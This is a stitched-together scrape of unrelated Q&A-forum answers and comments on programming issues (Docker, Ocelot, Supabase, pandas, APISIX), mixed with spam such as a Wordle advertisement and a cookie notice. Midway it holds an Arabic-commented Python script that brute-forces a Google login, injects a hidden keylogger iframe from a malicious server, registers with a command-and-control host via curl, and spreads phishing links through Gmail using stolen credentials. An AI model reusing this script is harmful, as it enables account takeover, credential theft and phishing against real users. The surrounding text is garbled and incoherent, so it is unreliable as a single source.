After below changes, I am able to access individual API and also via ocelot gateway using docker.
- Removed ports definition from docker-compose.yml
- In ocleot.json included service name as host and port as 8080
- Exposed only 8080 as port from API's docker file
Final ocelot.json
{
"Routes": [
{
"DownstreamPathTemplate": "/api/products",
"DownstreamScheme": "http",
"DownstreamHostAndPorts": [
{
"Host": "productservice",
"Port": 8080
}
],
"UpstreamPathTemplate": "/products",
"UpstreamHttpMethod": [ "Get" ]
},
]
}
Please check the documentation
https://git-extensions-documentation.readthedocs.io/en/release-5.1/remote_feature.html#pull-changes
How can I change the CSV output such a way that it removes the trailing zeros and does not use exponential notation (without explicitly using Decimal(18,2) data type)?
Follow the below steps to get the expected output:
Step1: Please try using the following expression to achieve the expected results.
replace(toString(toDecimal(Data)),'.00','')

Step2: I have used the same sample data that you provided. 
Step3: Use the following expression in the derived column as required.
replace(toString(toDecimal(Data)),'.00','')

Step4: Output is as expected as per your requirement.

The colored "odoo" logo is in ~/odoo/addons/web/static/img/logo.png if that is what you where looking for.
From shelve documentation, i can see use Shelf.close() if you want to close a shelf; use flag='r' ensures read-only mode and flag='c' allows creation if it doesn't exist. Other flag modes are w open an existing shelf; n always create a new, empty shelf, open for reading and writing.
What worked for me with physical device
Just Invalidate caches in android studio
File >> Invalidate Chaces
In my case the issue was a wrong build command for meson. I.e:
meson setup build --reconfigure -Db_coverage=true -Dc_args=-Og,-w
Is wrong, and should instead be:
meson setup build --reconfigure -Db_coverage=true -Dc_args=-Og
Adding an extra -w causes meson to pass that -w to a default C compiler as a test, which causes the compiler to return an exception. Meson then decides that the compiler doesn't work - and announces that the compiler for "c" is not specified for the host machine.
My recommend is Mongoose to management mongodb in nest.js project.
the watermark logo is being set to a fixed size (100px 100px) using background-size, which can cause it to appear too large on smaller screens, especially on mobile devices. To make the watermark more responsive and avoid it being too big on smaller screens, you can use media queries and relative sizing.
Every day, I look forward to my quick mental workout on Wordle Today (https://wordletoday.cc/). It’s the perfect way to start my morning—simple, fun, and just the right amount of challenge.
Today’s puzzle had me stumped at first, but after a few strategic guesses ("CRANE," "SLICE," "THIEF"), I finally cracked it with "OLIVE"! That moment when all the tiles turn green is so satisfying.
If you haven’t tried Wordle Today yet, I highly recommend it. It’s a great way to sharpen your mind and have a little fun. Plus, it’s free and easy to play!
What was your Wordle Today experience? Share your results below! 🎉Every day, I look forward to my quick mental workout on Wordle Today (https://wordletoday.cc/). It’s the perfect way to start my morning—simple, fun, and just the right amount of challenge.
Today’s puzzle had me stumped at first, but after a few strategic guesses ("CRANE," "SLICE," "THIEF"), I finally cracked it with "OLIVE"! That moment when all the tiles turn green is so satisfying.
If you haven’t tried Wordle Today yet, I highly recommend it. It’s a great way to sharpen your mind and have a little fun. Plus, it’s free and easy to play!
What was your Wordle Today experience? Share your results below! 🎉
Experiencing the same issue with .net 9 :-(
process seems hard to solve, it needs a notification system
Tailwind CSS new version is currently not working. Add the different version of Tailwind. It will work
I tried doing this, but every time I force quit the app and reopen it, the authentication does not persist
class SupabaseService {
Future initialize() async {
await Supabase.initialize(
url: supabaseUrl,
anonKey: supabaseKey,
);
}
}
// register the service
await locator<SupabaseService>().initialize();
// .. some code
if (!locator.isRegistered<SupabaseClient>()) {
locator.registerLazySingleton<SupabaseClient>(
() => Supabase.instance.client,
);
}
I had managed to make it persist by using local storage and saving the sessionString and recovering it. But now that I have upgraded my flutter and supabase version, the persistSessionString no longer exists
String? sessionString =
locator<SupabaseClient>().auth.currentSession?.persistSessionString;
// Add to local storage
// Get session string from local storage and recover session
await locator<SupabaseClient>().auth.recoverSession(sessionString);
Anyone got any ideas?
You can try to use:
'php_class_name' => self::class
Using this undocumented vc_map attribute allowed me to use completely different classname inside custom namespace.
source: https://stackoverflow.com/a/52983111/16246216
If the labels are not showing up then it means maybe fluent bit’s kubernetes filter is not configured correctly. For this you need to manually enrich the events using a custom Lua filter if the default kubernetes metadata collection isn’t sufficient.
Regarding your query, whether it requires direct calls to the Kubernetes API server via Lua scripts. Yes, Lua plugin would require direct API calls to the k8s API server to fetch Job labels. But the Fluent Bit Lua filter plugin has some limitations, like the Lua plugin does not include the necessary HTTP modules to fetch job metadata from the k8s API. To resolve this you need to enrich the data through an external processor. Refer to this How to configure Fluent Bit to collect logs for your K8s cluster blog by Giulia Di Pietro, which will be helpful to resolve the issue.
Note: If you intend to use Lua to interact with kubernetes API directly you will need to implement HTTP requests within Lua however this may require additional modules that aren't included by default fluent bit’s Lua plugin.
The formula should be dynamic based on your input value.
Change your formula to
formula = (x * 0.5/n) ** 2 + (y * 1.0/n) ** 2 - 1
This works fine
If you used pyproject.toml file
You may prefer list those filters in pyproject.toml file :
[tool.pytest.ini_options]
filterwarnings = [
"ignore::DeprecationWarning"
]
did u got an solution for this
After researching and testing more, I managed to solve this problem by acquiring Power Automate Premium license from my company and after that removing and importing the package again. This way all flows were turned on automatically after importing was done.
To my understanding majority of the flows required Premium license because they used Dataverse as the trigger.
The deepcopy function from Python’s copy module does not correctly copy Gym environments because Gym environments often contain non-serializable objects such as file handles, sockets, or Cython objects that deepcopy cannot handle properly. Additionally, many Gym environments maintain internal states that reference low-level C++ objects or use external dependencies that do not support deep copying............ Read More
This helps at jjwt 0.12.5:
public Claims parseToken(String token) {
return Jwts.parser().verifyWith(KEY).build().parseSignedClaims(token).getPayload();
}
Late answer, but yes, the whole system is not consistent all the time, even though the commit commands probably are sent in parallel to all resources, some of them might take a bit longer to finalize their work and locks might not be freed at the exact same time
To commit a message on a queue by the queue resource manager might go faster than commiting a bunch of SQL commands for a database resource manager, leading up to that a "listener" gets a message and reads "old" data from the database (in the next transaction)
I know that this particular issue have been solved by some in the way that they add a relative time duration to not make the message is available immediately to the "listener" (a feature most queue managers support)
I do have implemented full similar system.
Below is link to full guidance
After removing docker/network/files/local-kv.db and restarting docker, the docker recreate the right pre-defined networks.
The root cause of this seems to be a customized filesystem mount order problem, the storage of docker is configured to use a plugable m2 disk.
Did you find any solution to this problem? Now I Have the same issue.
When I change Any CPU to ARM64 is does not give error but is it correct way.And I make all changes in XCode Also I remove all pair files and re-pair my windows to mac.
I’m experiencing the same issue! It seems like SKPaymentQueue.defaultQueue.storefront.countryCode is cached. Even after changing the App Store country by switching Apple IDs, it still returns the wrong country code. Have you managed to solve this issue?
I was using the wrong address, it was localhost:8001/ customer /1
instead of localhost:8001/ customers /1
I started solving the same problem yesterday. Did you manage to solve it somehow?
So I found a solution to this problem. It might not be pretty but it works.
What I did is, I created a class named "JWTAuth" which uses the AuthBase class. When I call the class I pass the token. This way the auth parameter of pysolr will receive a object and not a string, thus it is happy.
class JWTAuth(AuthBase):
def __init__(self, jwt_token):
self.jwt_token = jwt_token
def __call__(self, r):
r.headers['Authorization'] = f'Bearer {self.jwt_token}'
return r
async def search(
skip: int = 0,
limit: int = 100,
params: SearchQueryParams = Depends(),
) -> Any:
"""
Search query.
"""
zookeeper = pysolr.ZooKeeper("search-zoo1,search-zoo2,search-zoo3")
solr = pysolr.SolrCloud(zookeeper, "tag", auth=JWTAuth(add-token-here))
res = solr.search(q=params.query, start=skip, rows=limit)
return SearchResults(data=res, count=res.hits)
This is the code that finally works.
thetashould be the angle between optic axis and the point on the image, so tan(theta) will be r/f assuming ris the distance of the 2D point (on the image) from the center of the image. Looks like I got the core concept wrong in the original post
img = cv2.imread(<impath>)[:,:,::-1]
H, W, _ = img.shape
cX, cY = W//2, H//2 #7, 5
f = min(cX, cY)
mapX = np.zeros((H, W))
mapY = np.zeros((H, W))
for x in range(W):
for y in range(H):
dx, dy = (x - cX), (y - cY)
r = np.sqrt(dx**2 + dy**2)
phi = np.arctan2(dy, dx)
theta = np.arctan(r/f)
rnew = f*theta
xnew = cX + rnew*np.cos(phi)
ynew = cY + rnew*np.sin(phi)
mapX[H - 1 - int(ynew), int(xnew)] = H - 1 - y
mapY[H - 1 - int(ynew), int(xnew)] = x
distorted = cv2.remap(np.array(img, "uint8"), np.array(mapY, "float32"), np.array(mapX, "float32"), interpolation=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT)
Try this
npm install @rollup/rollup-win32-x64-msvc --save-dev
I made my day by myself :). Thanks All :)
npm i -D puppeteer
npm i -g bun #or npm i -g tsx
puppeteer browsers install chrome
touch open-inspector.ts # should contain the code listed below
chmod +x open-inspector.ts
./open-inspector.ts
Running with tsx/bunjs
file ./open-inspector.ts
#!/usr/bin/env bun
# or #!/usr/bin/env tsx
import puppeteer from 'puppeteer';
const browser = await puppeteer.launch({ headless: false, defaultViewport: null });
const page = (await browser.pages()).at(0);
await page.goto('chrome://inspect');
await page.waitForSelector('#node-frontend');
await page.click('#node-frontend');
await page.close();
no more questions - runs like a charm
The best way to match GitHub's exact styling is to first render the Markdown as HTML in a browser (eg using markdown-viewer extension as mentioned above) and then print it to PDF. This ensures the closest possible visual match. The downside, though, is that many print-to-PDF methods embed text as images, making it unselectable.
I was actually browsing SO for ideas to improve my Markdown-to-PDF extension, and your question stood out. Right now, I’m working on implementing code block rendering with proper syntax highlighting, and I hope to solve this without relying on image-based exports. I’ll also definitely add a theme chooser to make styling more flexible.
A bug was opened a while back addressing this issue. As you can see in the interactions, I ended up using another tool for the test I needed writing, but it seems that what caused the problem with Pact was having set file_write_mode to merge. Seems that for some reason that couldn't be replicated, Pact retained this setting option even after l had removed it from its initialization.
Put this plugin as well in your pom.xml
<build>
<plugins>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-plugin-plugin</artifactId>
<version>3.8.1</version>
</plugin>
<!-- Other Plugins -->
</plugins>
</build>
The solution for first problem was to give the parameters a value when calling the report and not to rely on the defined default value.
For the second problem the solution was to REPLACE their position in the SQL query:
execute MyServer.MyDB.MyProc @Param2, @Param1, @Param3.
Then @Param1 and @Param2 got the right values.
Save image in desire path:
docker save -o /home/myimage.tar myimage-app
Transfer it using SCP:
scp /home/myimage.tar root@SERVER_IP:/home/
Explain the process clearly, i also trying to do the same thing
We’ve built a Docusign VS Code Extension - an AI-powered assistant that helps with issues like this by guiding you through token generation, consent setup, and API orchestration - making the integration process easier.
We’re currently running a closed beta to gather feedback and improve the experience. If you're interested, you can sign up here.
For me updating to the most recent version of Python Debugger (ms-python.debupy) extension (release 2025.4.1) solved the issue!
If your DMARC, SPF, or DKIM authentication is failing with a third-party mail service, check the following:
SPF: Ensure your SPF record includes the third-party service's mail servers. Only one SPF record should be present in DNS.
DKIM: Verify that DKIM signing is enabled in your third-party provider settings and that the correct DKIM key is published in DNS.
DMARC: Confirm that your DMARC record is correctly set up and not enforcing a strict policy that could block unauthenticated emails.
Domain Alignment: Ensure the "From" domain matches the SPF or DKIM domain to pass DMARC alignment.
Email Headers: Check the email headers for SPF, DKIM, and DMARC results to identify where authentication is failing.
Third-Party Service Settings: Some providers require additional configuration—check their documentation for DMARC compliance.
[FrameworkServlet.java:534] : Context initialization failed com.google.inject.internal.util.$ComputationException: java.lang.ArrayIndexOutOfBoundsException: 14659
we are facing same issue while starting up the application
and we are using java 11 to building the warfile and samw warfile
we deployed in dev2 and UAT but same branch 7.8.8 branch deployed in Dev its working fine with 7.8.8 and 7.8.7 not working getting same issue
There are no limits or quotas, but it would be practical to consider battery optimisation and system health
can i ask what the results of this project I have nearly project of youres
I had two classes each with @Setup: ChromeDriver.
Now I made a WebDriverManager class with a singleton factory. That did the trick!
Pls show what error you are getting. Share the log for it.
-----BEGIN CERTIFICATE REQUEST-----
MIIC3zCCAccCAQAwgZkxFzAVBgNVBAMMDmtldmFsbiBbU3RhbXBdMRMwEQYDVQQF
Ewo0MTIwMDMyOTkxMRUwEwYDVQQKDAxHb3Zlcm5tZW50YWwxGzAZBgNVBAsMEtmH
2YTZiCDYr9ixINmH2YTZiDELMAkGA1UEBhMCSVIxEzARBgNVBAgMCtiq2YfYsdin
2YYxEzARBgNVBAcMCtiq2YfYsdin2YYwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw
ggEKAoIBAQCqgwrMjfSKtIKWE1XNwklW6mCHYcwwc/A1rTZ2ejCHELWGUhYzbj6t
ijgE4iY3FGhytudzDBOVcbdQAhwpunnY14uAPu/UtGhuhPRxKcCmb+GopiY3umnN
LHPPcTgKUlQlUm4ytNDuFJ7GmRGQ/q4F+UR2hWQTQvGGvlHNa27zDpKQEPD/gxac
hogNJ0yb52JPJJSvxmD1Oqhu5dA2GT3MB90zqkdNDX7t8WSA0nB9kOGNoVMudq6b
4N02fYvZstZ0mIUPhqPJ97s4jKzKxu+0aNzJr+eRcj/tARAewdYdgua/htwHKq1F
CcBE6S48PHZTnNx1DOuPRPlEoHHzMrqrAgMBAAGgADANBgkqhkiG9w0BAQsFAAOC
AQEACW+LhlWgpD3P40j07UYZngsS9mv0rfAqGxSVV/G9sqn1mgcBqXG3Nxzd6iHE
XHQqOWYmZCioH5wC1umNawZ+EItDdbkJMlHlnjsx3nbOAAPg5fK3KBDAliPSgcaU
MTqn2oPqJIWFKZ4g0fQRXj33P6tCm1kFlRzrP92K3TLIg0BfFzDpPL2KWM58EmlN
CX/W34xKCZFAMCTwNLVHJpzY8dxv+waOStLFMYqjcBP8uKPIPir1bXaygihW5EB4
e1EFMdYqyysaDTgQP8RZTlha9EZbLIY8x0RstjXtCrx5aSptylHl5cXH89zQUjAh
G9EMLGBKqVL+/rLP/PzFGY2d3g==
-----END CERTIFICATE REQUEST-----
i was blind and now i see.
https://json-schema.org/draft-04/schema
this version is supported in this nuget. so no condidional .
What an answer ! solves the problem (presumbly) and creates a completly new one! how to create the settings file ! great !
Horrible, unhelpful, waste of time of an answer, might have as well keept it to yourself
I wonder how can we iterate for other lines can you please give me an example for that?
I simplified all queries and went from fetching a few fields to all. Now it seems to work. Really weird.
public function render()
{
if (!$this->email) {
abort(404);
}
$this->klant = VasteKlanten::where('email', $this->email)->first();
if (!$this->klant) {
$this->klant = Reserveringen::where('email', $this->email)
->orderBy('id', 'desc')
->first();
$this->vaste_klant = false;
}
if ($this->klant) {
$this->reserveringen = Reserveringen::where('email', $this->email)->get();
$this->invitatie = NieuweKlanten::where('email', $this->klant->email)->get();
}
return view('livewire.beheer.klant-details');
}
As it turns out the Jet Driver has problems with the one to many field types... you delete them it works... for CRUD APIs...
# -----------[مرحلة ١: التأسيس الخبيث]-----------
# استخدم قوة جوجل ضدها
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import pyautogui
def create_google_site():
\# اختطاف متصفح الضحية
driver = webdriver.Chrome(executable_path='/path/to/chromedriver')
driver.get("https://accounts.google.com/signin")
\# حقن بيانات الدخول (الضحكة الشريرة)
email = driver.find_element_by_name("identifier")
email.send_keys("[email protected]")
email.send_keys(Keys.RETURN)
time.sleep(2)
\# اختراق كلمة المرور باستخدام هجوم القوة العمياء
password = driver.find_element_by_name("password")
with open("passwords.txt", "r") as f:
for line in f:
password.send_keys(line.strip())
password.send_keys(Keys.RETURN)
time.sleep(0.5)
if "Welcome" in driver.page_source:
break
\# بناء الموقع السرّي
driver.get("https://sites.google.com/new")
time.sleep(5)
\# حقن شيفرة خبيثة في القالب
pyautogui.hotkey('ctrl', 'shift', 'i') # فتح أدوات المطور
time.sleep(1)
driver.execute_script("""
document.body.innerHTML += \`
\<iframe src="https://your-malicious-server/keylogger"
style="display:none;"\>\</iframe\>
\`;
""")
\# حفظ الموقع باسم بريء
pyautogui.write('My Innocent Site')
pyautogui.hotkey('ctrl', 's')
time.sleep(3)
driver.quit()
# -----------[مرحلة ٢: التمويه والتدمير]-----------
# تحويل الموقع إلى فخ رقمي
def deploy_trojan_site():
create_google_site()
\# ربط الموقع مع أدوات التجسس
subprocess.Popen(\[
'curl',
'-X', 'POST',
'https://your-c2-server/register',
'--data',
'site_url=https://sites.google.com/site/malicious-site'
\])
# -----------[مرحلة ٣: الانتشار كالنار]-----------
# استغلال صلاحيات جوجل للسيطرة
def spread_via_google_services():
from googleapiclient.discovery import build
creds = "stolen_credentials.json"
drive_service = build('drive', 'v3', credentials=creds)
\# نشر الموقع عبر مشاركات جوجل درايف
file_metadata = {
'name': 'Important_Document',
'mimeType': 'application/vnd.google-apps.site'
}
media = MediaFileUpload('fake_site.html', mimetype='text/html')
drive_service.files().create(
body=file_metadata,
media_body=media,
fields='id'
).execute()
\# إرسال الفيروس عبر جيميل
gmail_service = build('gmail', 'v1', credentials=creds)
message = MIMEText("انقر هنا لرؤية المستند: https://sites.google.com/fake-site")
message\['to'\] = '[email protected]'
message\['subject'\] = 'مستند سري'
raw = base64.urlsafe_b64encode(message.as_bytes()).decode()
gmail_service.users().messages().send(
userId='me',
body={'raw': raw}
).execute()
if _name_ == "_main_":
deploy_trojan_site()
spread_via_google_services()
In my case there was problem with async method Main() in Program class. When I have changed it to sync, FolderBrowserDialog has opened ok.
did you find any answer to this?
%matplotlib inline this line should be on the top of your script
To resolve this, navigate to Debug > Windows > Modules, right-click the GPNSAutomation.dll and select Load Symbols (VS Code 2022) to load the symbols manually.
By the way, this is not an error - it's merely a notification that the PDBs could not be loaded. You could read this doc Load symbols for more information.
Verify the column data type . Check that the column you are trying to update is actually of type int. It is possible that the column may have been defined with a type like varchar, char, or binary, which could have size limits.
I also had this problem and it turned out that the path on my Windows machine exceeded the 256 character limit. The solution was to move the checked out folder directly to C:\xyz.
In my case I deleted the lock file.
You can use google spreadsheets with Highcharts, please see the documentation with examples and link to the API: https://www.highcharts.com/docs/working-with-data/data-module
API: https://api.highcharts.com/highcharts/data.googleSpreadsheetKey
Best,
just add width height not in style <iframe class="map" width="510" height= "510" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d367298.85638395866!2d76.72027160297871!3d8.824467905511694!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3b05dc75a70fa0c3%3A0x5e9601dca63dd3fb!2sPMSA%20College%20kuttikadu%20kadakal!5e0!3m2!1sen!2sin!4v1643646588236!5m2!1sen!2sin"></iframe>
Hello,Have you found a solution,brother
-- Step 1: Add a new column with the required precision
-- Step 2: Copy data from the old column to the new column
-- Step 3: Drop the old column (only after verifying the data)
-- Step 4: Rename the new column to match the original column name
This worked in ORACLESQL DEVELOPER
You can show your adaptive cards inside Telegram App during the user conversation. Anyway that's not a Telegram native support question.
Found this article useful in understanding this at a practical level. Re-reading the accepted answer after this made sense.
Ok, i found the way to do that. using the following command:
npx create-vite@latest my-app-name --template react
You can also write this way...and this is for typescript code const userSchema = new mongoose.Schema({ username: String, email: String, password: String, firstname: String, lastname: String, mobile: { type: Number, validate: { validator: function (v: number) { return /d{10}/.test(v.toString()); }, message: "mobile number must be exactly 10 digits" }, }, });
The culprit for this was the log_subcmds option in sudoers, which itself uses ptrace and seccomp and has some documented limitations.
Thanks to DymOK on the TrueNAS forum who figured this out.
I face the same issues. Has anybody found any solutions?
I start a new project (maui .net8), i change the svg files (Colors, etc.) and in android everything works but in IOS the purple .NET icon & splash screen remains the same when i run app in local device.
Has anybody resolved this?
Run and debug -> uncheck raised exception, uncaught exception
As a workaround I manage to use dynamic sql:
CREATE OR REPLACE PROCEDURE p_json_test(v_id_1 NUMBER, v_id_2 NUMBER) IS
v_sql VARCHAR2(4000);
BEGIN
v_sql := 'INSERT INTO JSON_RESAULT_TABLE
SELECT ID, JSON_OBJECT(*)
FROM JSON_TABLE
WHERE ID IN (:1, :2)';
EXECUTE IMMEDIATE v_sql USING v_id_1, v_id_2;
END;
/
execute p_json_test(1, 2);
This approach solve an issue
Is there any way to convert rdf:PlainLiteral to string, the exception thrown by the swrl built-ins
My facebook account is disabled please recover my id I don't done anything my account was hacked few days earlier
@christopher moore, thanks for your response
In my case(5.2.2) just replace in config.inc.php cookie to config and add 2 lines like bellow:
/* Authentication type */
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root'; //add this line
$cfg['Servers'][$i]['password'] = 'root'; //add this line
Like if you want to install, configure and start fail2ban, this can be done in 2 ways:
First one is to do it making sub-tasks:
The other way is do make sub-roles:
Haha....
The json was wrong:
{ title: "event2", start: "2025-03-15" }
I changed int argc, char *argv[] in the class constructor to int& argc, char **argv and everything worked
This solution was found when I tried to create a second window of the application
1-canny edge detection method
2-template matching
3-edge detection
4-Hough circle transform
These must work, do let me know if you have any questions, cheers!
@Imran, How to replicate the same postman process in python. i am not able to get proper documentation on using confidentialclient library from msal.
Use below commands in VS Code (PowerShell)
Remove-Item -Recurse -Force node_modules
Remove-Item -Force package-lock.json
npm install --legacy-peer-deps
NOTE: This will reset any issue and redownload the required items again.
The issue could also be a setting in VScode that selects language-specific themes. You can change that in your settings.json
The issue occurs because the original approach uses:
None
if df_obsFinding["Rejection_Comments"] is None
else df_obsFinding["Rejection_Comments"].apply(len) != 0
However, the condition df_obsFinding['Rejection_Comments'] is None does not check each row individually. Instead, it evaluates wherther the entier column object is None, which will never be the case. As a result, the code proceeds to the else part and calls .apply(len). This iterates over the entier column, and when it encounters None values, it results in:
TypeError: object of type 'NoneType' has no len()
To fix this, we must check each element in the column individually using apply(lambda x: isinstance(x, list) and len(x) != 0
df_ofComment = df_obsFinding.loc[
(
df_obsFinding["Comments"].apply(
lambda x: isinstance(x, list) and len(x) != 0
)
)
| (
df_obsFinding["Rejection_Comments"].apply(
lambda x: isinstance(x, list) and len(x) != 0
)
)
]
✅ isinstance(x, list) ensures x is a list before calling len(x). This is avoiding the errors from None values.
✅ len(x) != 0 filters out empty lists.
✅ The logical OR (|) selects rows where either Comments or Rejection_Comments contain a non-empty list.
If Comments or Rejection_Comments might contain strings, we should also check for str:
df_ofComment = df_obsFinding.loc[
(
df_obsFinding["Comments"].apply(
lambda x: isinstance(x, (list, str)) and len(x) != 0
)
)
| (
df_obsFinding["Rejection_Comments"].apply(
lambda x: isinstance(x, (list, str)) and len(x) != 0
)
)
]
Note: This ensures the solution works even if
CommentsorRejection_Commentscontain strings instead of lists.
Input DataFrame
import pandas as pd
df_obsFinding = pd.DataFrame(
data={
"Post_Name": [
"First Post",
"Second Post",
"Third Post",
"Fourth Post",
"Fifth Post",
],
"Comments": [[], [1234], [1234], [], []],
"Rejection_Comments": [None, [], [657], "Needs Review", [987]],
}
)
Data Preview
| Post_Name | Comments | Rejection_Comments |
|---|---|---|
| First Post | [] |
None |
| Second Post | [1234] |
[] |
| Third Post | [1234] |
[657] |
| Fourth Post | [] |
Needs Review |
| Fifth Post | [] |
[987] |
Filtered DataFrame (df_ofComment)
| Post_Name | Comments | Rejection_Comments |
|---|---|---|
| Second Post | [1234] |
[] |
| Third Post | [1234] |
[657] |
| Fourth Post | [] |
Needs Review |
| Fifth Post | [] |
[987] |
I'm having the same issue. I have set up Apache APISIX and its dashboard using Docker on Windows . The dashboard loads, but when I try to log in, it redirects back to the login page without any error message.
docker-compose.yml
services:
apisix:
image: apache/apisix:${APISIX_IMAGE_TAG:-3.11.0-debian}
restart: always
volumes:
- ./apisix_conf/config.yaml:/usr/local/apisix/conf/config.yaml:ro
depends_on:
- etcd
##network_mode: host
ports:
- "9180:9180/tcp"
- "9080:9080/tcp"
- "9091:9091/tcp"
- "9443:9443/tcp"
- "9092:9092/tcp"
networks:
apisix:
etcd:
image: bitnami/etcd:3.5.11
restart: always
volumes:
- etcd_data:/bitnami/etcd
environment:
ETCD_ENABLE_V2: "true"
ALLOW_NONE_AUTHENTICATION: "yes"
ETCD_ADVERTISE_CLIENT_URLS: "http://etcd:2379"
ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
ports:
- "2379:2379/tcp"
networks:
apisix:
web1:
image: nginx:1.19.0-alpine
restart: always
volumes:
- ./upstream/web1.conf:/etc/nginx/nginx.conf
ports:
- "9081:80/tcp"
environment:
- NGINX_PORT=80
networks:
apisix:
web2:
image: nginx:1.19.0-alpine
restart: always
volumes:
- ./upstream/web2.conf:/etc/nginx/nginx.conf
ports:
- "9082:80/tcp"
environment:
- NGINX_PORT=80
networks:
apisix:
prometheus:
image: prom/prometheus:v2.25.0
restart: always
volumes:
- ./prometheus_conf/prometheus.yml:/etc/prometheus/prometheus.yml
ports:
- "9090:9090"
networks:
apisix:
grafana:
image: grafana/grafana:7.3.7
restart: always
ports:
- "3000:3000"
volumes:
- "./grafana_conf/provisioning:/etc/grafana/provisioning"
- "./grafana_conf/dashboards:/var/lib/grafana/dashboards"
- "./grafana_conf/config/grafana.ini:/etc/grafana/grafana.ini"
networks:
apisix:
dashboard:
image: apache/apisix-dashboard:latest
restart: always
depends_on:
- apisix
- etcd
volumes:
- ./dashboard_conf/conf.yaml:/usr/local/apisix-dashboard/conf/conf.yaml:ro
ports:
- "9000:9000"
- "9001:9001"
networks:
apisix:
networks:
apisix:
driver: bridge
volumes:
etcd_data:
driver: local
apisix_conf/config.yaml
apisix:
node_listen: 9080 # APISIX listening port
enable_ipv6: false
enable_control: true
control:
ip: "0.0.0.0"
port: 9092
deployment:
admin:
allow_admin: # https://nginx.org/en/docs/http/ngx_http_access_module.html#allow
- 0.0.0.0/0 # We need to restrict ip access rules for security. 0.0.0.0/0 is for test.
admin_key:
- name: "admin"
key: edd1c9f034335f136f87ad84b625c8f1
role: admin # admin: manage all configuration data
- name: "viewer"
key: 4054f7cf07e344346cd3f287985e76a2
role: viewer
etcd:
host: # it's possible to define multiple etcd hosts addresses of the same etcd cluster.
- "http://etcd:2379" # multiple etcd address
prefix: "/apisix" # apisix configurations prefix
timeout: 30 # 30 seconds
plugin_attr:
prometheus:
export_addr:
ip: "0.0.0.0"
port: 9091
dashboard_conf/conf.yaml
conf:
listen:
host: 0.0.0.0
port: 9000
etcd:
endpoints:
- http://etcd:2379
log:
error_log:
level: debug # Change to "debug" to see more details
file_path: /usr/local/apisix-dashboard/logs/error.log
access_log:
file_path: /usr/local/apisix-dashboard/logs/access.log
authentication:
secret: secret_123 # secret for jwt token generation.
# NOTE: Highly recommended to modify this value to protect `manager api`.
# if it's default value, when `manager api` start, it will generate a random string to replace it.
expire_time: 3600 # jwt token expire time, in second
users:
- username: admin # username and password for login `manager api`
password: admin123
In Windows open task manager then end the tasks for adb.exe and then restart your pc then reopen your android studio. That worked for me
my solution was
if (!app.Environment.IsProduction())
{
app.Use((context, next) =>
{
context.Request.Scheme = "https";
return next(context);
});
}
In Windows open task manager then end the tasks for adb.exe. i restarted my pc and That worked for me
Simply restarting the laptop helped me. Not sure if there was some cache issue.
Following your feedback, I looked at the ConsumeKafkaRecord and I think that yes you're right I could apply the following Flow: ConsumeKafkaRecord(ScriptedReader, CSVWriter) => MergeContent => UpdateAttributes => PutFile.
1/ In the ConsumeKafkaRecord, I'd like to use a ScriptedReader to convert and modify the json message and a CSVWriter to write the new message.
2/ MergeContent to merge the stream files.
3/ UpdateAttributes to change the file name.
4/ PutFile to write the file
The only problem is the header I want to write to the CSV file, as I only want one header.
Do you agree with this flow?
Thanks a lot.
To crawl a face image using Google Image Search engine, follow these steps:
Go to Google Images.
Click on the camera icon (Upload an image).
Upload the face image or paste its URL.
Google will show visually similar images and related websites.
Open Google Lens in the Google app or Chrome.
Upload or scan the face image.
Lens provides matching images, profiles, and sources.
Use Selenium or BeautifulSoup with Google Search queries.
Use face search engine to match image results programmatically.
Crawling face images without consent may violate privacy laws. Always follow ethical and legal guidelines.
There 3 types of repos. you can delete like below.
local repo -> git branch -d branch_name
origin repo-> git branch --delete --remotes origin/branch_name
upstream repo-> git branch --delete --remotes upstream/branch_name
I have not looked into this specifically from the APS side of things, but The Building Coder shares quite a few posts on setting up section boxes:
Check the newest suggested standards here: https://html.spec.whatwg.org/multipage/rendering.html#phrasing-content-3
Sorry, I can't find the about:blank sniffing technique that was referred to by ruakh
@Service("customuserdetails")
public class CustomUserDetails implements UserDetailsService {
@Autowired
private UserRepo userrepo;
@Override
public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException {
Supplier<UsernameNotFoundException> s= () -> new UsernameNotFoundException("Error finding the user");
User user=userrepo.findByUsername(username).orElseThrow(s);
return user;
}}
This is the implementation which is working. I had to change my security beans to @configuration, and I added @repository to my repo interfaces. I also ended up changing my User class to implement UserDetails.
Here is a demo given by react flow on how to download a diagram as image https://reactflow.dev/examples/misc/download-image
We and our 94 partners store and/or access information on a device, such as unique IDs in cookies to process personal data. You may find out more about the purposes for which we and our partners use cookies or exercise your preferences by clicking the ‘Cookie Settings’ button below. You can revisit your consent choices or withdraw consent at any time by clicking the link to your cookie settings in our Cookie Policy. These choices will be signaled to our partners and will not affect browsing data.
I too faced a similar issue when using parallel stream API.
Below is the scenario; I have a list of transaction objects in reader part of a spring batch , when this list if passed to processor, used parallel stream to process the transaction object in a multi threaded mode. but unfortunately, the parallel stream is not consistent. it is skipping the records at times.
Any fix added in java.util.stream API?
Use a set instead of an array for storing the visited nodes. Sets have O(1) lookup time, resulting in a total time complexity of O(n) for your algorithm, which is otherwise correct.
As for the statement that "going from node a to b to a isn't a cycle",
This is true if you consider simple graphs only and have to use the same edge twice, in multigraphs you may have more than one edge connecting a and b in which case a-b-a over distinct edges counts as a cycle.
Might be unrelated but I just had an experience with this, and the problem I had was the directory it was trying to build in which at that time was the Desktop, I've changed into a subfolder and it worked without any other steps required.